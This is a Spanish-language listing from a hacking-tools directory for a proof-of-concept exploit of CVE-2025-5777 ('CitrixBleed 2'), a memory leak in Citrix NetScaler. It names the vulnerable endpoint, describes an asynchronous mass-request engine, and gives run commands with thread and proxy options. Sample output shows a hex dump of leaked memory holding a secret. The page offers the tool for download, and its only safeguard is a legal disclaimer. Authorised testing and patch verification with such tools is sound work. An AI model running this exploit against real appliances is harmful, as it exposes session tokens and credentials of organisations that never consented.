Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5777 — PoC de Fuga de Memoria en Citrix NetScaler | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de PenetraciónRed Teaming
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

PoC de Fuga de Memoria en Citrix NetScaler

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5777 - Prueba de Concepto de Fuga de Memoria en Citrix NetScaler

📌 Descripción

Este script explota una vulnerabilidad crítica de divulgación de memoria en los dispositivos Citrix NetScaler ADC/Gateway, identificada como CVE-2025-5777 (denominada CitrixBleed 2). Provoca una fuga de memoria a través del endpoint /p/u/doAuthentication.do, revelando memoria no inicializada que contiene datos sensibles como fragmentos XML, tokens y potencialmente credenciales.

  • 📅 CVE ID: CVE-2025-5777
  • ⚙️ Impacto: Divulgación de Información
  • 🧑‍💻 Autor: [0xgh057r3c0n]
  • 🧵 Concurrencia: Asíncrono con aiohttp
  • 📦 Dependencias: aiohttp, colorama

🚀 Características

  • Motor de solicitudes masivas asíncrono usando asyncio + aiohttp
  • Volcado hexadecimal de fragmentos de memoria filtrados
Descargar herramienta
  • Detección automática de la fuga de memoria <InitialValue>
  • Modo verbose para depuración y vista previa de respuestas
  • Manejo elegante de interrupciones (Ctrl+C)

  • 🧪 Uso

    root@kitploit:~
    python3 CVE-2025-5777.py http://<target> [options]
    

    🔧 Opciones

    OpciónDescripción
    -v, --verboseHabilitar salida de depuración verbose
    -p <proxy>Usar proxy HTTP (ej. http://127.0.0.1:8080)
    -t <threads>Número de solicitudes concurrentes (predeterminado: 10)

    📥 Ejemplo

    root@kitploit:~
    python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
    

    📤 Salida de Ejemplo

    root@kitploit:~
    _____________   _______________         _______________   ________   .________          .___________________________________ 
    \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
    /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
    \     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
     \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
            \/                  \/                  \/     \/         \/       \/                 \/                             
    
             Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                         Author: 0xgh057r3c0n
    
    [🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
    [✔️ ] ¡Fuga de memoria InitialValue encontrada!
    [🧠] Volcado hexadecimal:
    ------------------------------------------------------------------------
    00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
    00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
    00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
    ------------------------------------------------------------------------
    
    [✔️ ] Fuga confirmada. Continuando extracción...
    

    ⚠️ Aviso Legal

    Esta prueba de concepto está destinada únicamente para pruebas de seguridad educativas y autorizadas. El escaneo o explotación no autorizada de sistemas que no posees es ilegal.